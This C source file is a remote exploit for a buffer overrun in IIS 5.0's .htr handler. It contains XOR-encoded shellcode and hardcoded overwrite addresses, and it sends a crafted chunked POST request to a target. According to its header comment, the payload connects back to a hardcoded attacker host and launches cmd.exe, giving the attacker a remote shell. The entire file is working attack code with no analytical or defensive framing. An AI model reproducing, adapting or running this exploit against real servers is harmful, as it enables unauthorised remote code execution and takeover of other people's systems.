/*
 IIS5.0 .htr overrun remote exploit
 Programmed by hsj  : 02.06.29

 code flow:
  overrun -> exception -> rewrite thread-local handler ->
  exception -> shellcode -> make back channel ->
  exec cmd.exe
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <limits.h>
#include <netdb.h>
#include <arpa/inet.h>

#define RET                 0x0045a910  /* our payload */
#define REWRITE             0x008cedbc  /* exception handler on stack */

#define PORT                25
#define ADDR                "attacker.mydomain.co.jp"
#define PORT_OFFSET         518
#define ADDR_OFFSET         523
unsigned char shellcode[]=
/* decoder */
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1d\x8d\xa0\xf0"
"\xfb\xff\xff\x83\xe4\xfc\x8d\x6c\x24\x10\x33\xc9\x66\xb9\x85\x02"
"\x80\x30\x93\x40\xe2\xfa"
/* code */
"\x7b\x27\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
"\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
"\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xfa\xe3\xf6\x93\xd0\xe1\xf6\xf2"
"\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93\xc3\xf6\xf6\xf8\xdd"
"\xf2\xfe\xf6\xf7\xc3\xfa\xe3\xf6\x93\xc4\xe1\xfa\xe7\xf6\xd5\xfa"
"\xff\xf6\x93\xc1\xf6\xf2\xf7\xd5\xfa\xff\xf6\x93\xc0\xff\xf6\xf6"
"\xe3\x93\xd6\xeb\xfa\xe7\xc3\xe1\xfc\xf0\xf6\xe0\xe0\x93\xd0\xff"
"\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xe4\xe0\xa1\xcc\xa0\xa1"
"\x93\xc4\xc0\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xe0\xfc\xf0\xf8"
"\xf6\xe7\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93\xf0"
"\xfc\xfd\xfd\xf6\xf0\xe7\x93\xe0\xf6\xfd\xf7\x93\xe1\xf6\xf0\xe5"
"\x93\xf0\xfe\xf7\xbd\xf6\xeb\xf6\x93\xc9\xc1\x28\x93\x93\x63\xe4"
"\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0\xaf\x90\x60"
"\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87\xc5\xa0\x53"
"\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60\x35\xca\xcc"
"\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5\xb7\x90\x40"
"\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90\x50\x52\x72"
"\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22\x9a\x7b\xd9"
"\x92\x93\x93\x10\x55\x9f\xc1\xc5\x6c\xc4\x4f\xc9\x18\x4b\xa0\x5a"
"\x22\x95\x7b\xa5\x92\x93\x93\x10\x55\x96\x54\xd6\x93\x9f\x93\x93"
"\x93\x54\xd6\x97\x93\x93\x93\x93\x54\xd6\x9b\x92\x93\x93\x93\xf9"
"\x93\xc6\x1e\xd6\x63\xc3\x1e\xd6\x67\xc3\x6c\xc4\x5b\xf9\x93\xc6"
"\x1e\xd6\x6b\xc3\x1e\xd6\x6f\xc3\x6c\xc4\x5b\xa0\x53\xa0\x5a\x22"
"\x82\xc4\x18\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x18\xd6"
"\x63\x1a\xd6\xaf\x1a\xd6\xd3\x18\xd6\x6f\x1a\xd6\xab\x54\xd6\xbf"
"\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6\xc2\xc2\xc2\xd2\xc2\xda\xc2"
"\xc2\xc5\xc2\x6c\xc4\x5f\x6c\xe6\x63\x6c\xc4\x77\x6c\xe6\x6f\x6c"
"\xc4\x77\xc6\xfb\x92\x92\x93\x93\x6c\xc4\x7b\x16\x53\x9c\x16\x36"
"\x93\x93\x93\xc3\xd3\xc3\xd3\xc3\x6c\xc4\x7f\x10\x6b\x6c\x9c\x17"
"\x07\x93\x93\x93\x18\x4b\xf5\x54\xd6\x93\x91\x93\xf5\x54\xd6\x91"
"\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9\x83\xc6\xc0\x6c\xc4\x67"
"\xf9\xa1\x6c\xc4\x4f\xa0\x5a\xc2\xc4\xc2\xc2\xc2\x6c\xe6\x67\x6c"
"\xc4\x43\x16\x53\xe7\xcd\x03\x03\x03\x03\x10\xac\x93\xe7\xbc\x03"
"\x03\x03\x03\xf9\x93\xc4\xfb\x93\x97\x93\x93\xc6\x6c\xe6\x67\x6c"
"\xc4\x4b\x16\x53\xe7\xad\x03\x03\x03\x03\xf9\x93\x6c\xa4\xc6\xc0"
"\x6c\xc4\x6b\x10\x6b\x6c\xe7\xbf\x03\x03\x03\x03\x78\x21\xf9\x93"
"\xfb\x93\x97\x93\x93\xc6\xc0\x6c\xc4\x6f\x16\x53\xed\x85\x03\x03"
"\x03\x03\xf9\x93\xc4\xc3\xc6\x6c\xe6\x6b\x6c\xc4\x47\xf9\xa1\x6c"
"\xc4\x4f\x78\x1f\xc0\x6c\xc4\x63\xf9\x93\x6c\xc4\x73\x19\x95\xd5"
"\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca\x1a\x94\xd4\xd4"
"\xd4\xd4\x71\x7a\x50";

unsigned int resolve(char *name)
{
    struct hostent *he;
    unsigned int ip;

    if((ip=inet_addr(name))==(-1))
    {
        if((he=gethostbyname(name))==0)
            return 0;
        memcpy(&ip,he->h_addr,4);
    }
    return ip;
}

int make_connection(char *address,int port)
{
    struct sockaddr_in server,target;
    int s,i,bf;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET,SOCK_STREAM,0);
    if(s<0)
        return -1;
    memset((char *)&server,0,sizeof(server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = htonl(INADDR_ANY);
    server.sin_port = 0;

    target.sin_family = AF_INET;
    target.sin_addr.s_addr = resolve(address);
    if(target.sin_addr.s_addr==0)
    {
        close(s);
        return -2;
    }
    target.sin_port = htons(port);
    bf = 1;
    ioctl(s,FIONBIO,&bf);
    tv.tv_sec = 10;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    connect(s,(struct sockaddr *)&target,sizeof(target));
    if((i=select(s+1,0,&wd,0,&tv))==(-1))
    {
        close(s);
        return -3;
    }
    if(i==0)
    {
        close(s);
        return -4;
    }
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);
    if((bf!=0)||(i!=sizeof(int)))
    {
        close(s);
        errno = bf;
        return -5;
    }
    ioctl(s,FIONBIO,&bf);
    return s;
}

int main(int argc,char *argv[])
{
    int i,j,s;
    unsigned int cb;
    unsigned short port;
    char buf[8192],buf2[16384];

    if(argc<3)
    {
        printf("usage :$ %s ip port\n",argv[0]);
        return -1;
    }

    if(!(cb=resolve(ADDR)))
        return -2;

    s = make_connection(argv[1],atoi(argv[2]));
    if(s<0)
    {
        printf("connect error:[%d].\n",s);
        return -3;
    }

    j = strlen(shellcode);
    port = htons(PORT);
    port ^= 0x9393;
    cb ^= 0x93939393;
    *(unsigned short *)&shellcode[PORT_OFFSET] = port;
    *(unsigned int *)&shellcode[ADDR_OFFSET] = cb;
    for(i=0;i<strlen(shellcode);i++)
    {
        if(((shellcode[i]>=0x09)&&(shellcode[i]<=0x0d))||
           (shellcode[i]==0x25)||(shellcode[i]==0x2b)||
           (shellcode[i]==0x3d))
            break;
    }
    if(i!=j)
    {
        printf("bad portno or ip address...\n");
        close(s);
        return -4;
    }

    for(i=0;i<sizeof(buf)-strlen(shellcode)-12-1;)
    {
        buf[i++] = 0xeb;
        buf[i++] = 0x06;
    }
    *(unsigned int *)&buf[i] = 0x41414141;
    *(unsigned int *)&buf[i+4] = 0x41414141;
    *(unsigned int *)&buf[i+8] = 0x41414141;
    memcpy(&buf[sizeof(buf)-strlen(shellcode)-1],shellcode,strlen(shellcode));
    buf[sizeof(buf)-1] = 0;
    sprintf(buf2,"POST /a.htr?%s HTTP/1.0\r\n"
                 "Transfer-Encoding: chunked\r\n\r\n20\r\n"
                 "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
                 "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
                 "XXXXYYYY\r\n0\r\n\r\n\r\n",buf);
    j = strlen(buf2);
    *(unsigned int *)strstr(buf2,"YYYY") = REWRITE;
    *(unsigned int *)strstr(buf2,"XXXX") = RET;
    write(s,buf2,j);

    printf("---");
    for(i=0;i<j;i++)
    {
        if((i%16)==0)
            printf("\n");
        printf("%02X ",buf2[i]&0xff);
    }
    printf("\n---\n");

    sleep(3);
    shutdown(s,2);
    close(s);

    printf("Done.\n");

    return 0;
}